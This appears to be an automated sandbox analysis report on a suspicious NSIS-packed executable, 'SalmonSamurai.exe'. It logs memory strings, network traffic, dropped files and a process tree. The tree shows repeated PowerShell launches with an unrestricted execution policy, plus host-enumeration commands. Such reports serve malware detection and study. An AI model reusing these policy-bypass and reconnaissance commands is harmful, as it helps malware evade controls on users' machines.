Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageviewhttps://www.yandex.kz/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icohttps://yandex.by/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icohttps://yandex.com/search/?text=
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVEmemstr_c5713ea2-2

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile dump: SalmonSamurai.exe.0.dr 160143360Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess Stats: CPU usage > 49%
Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: powershell.exe, 00000010.00000002.1597653809.0000022B9DB07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LC:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5xmwznm.vbp
Source: classification engineClassification label: mal42.evad.winEXE@77/139@2/2
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user~1\AppData\Local\Temp\nseC67A.tmpJump to behavior
Source: SalmonSamurai.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SalmonSamurai.exeReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile read: C:\Users\user\Desktop\SalmonSamurai.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SalmonSamurai.exe "C:\Users\user\Desktop\SalmonSamurai.exe"
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: wldp.dllJump to behavior
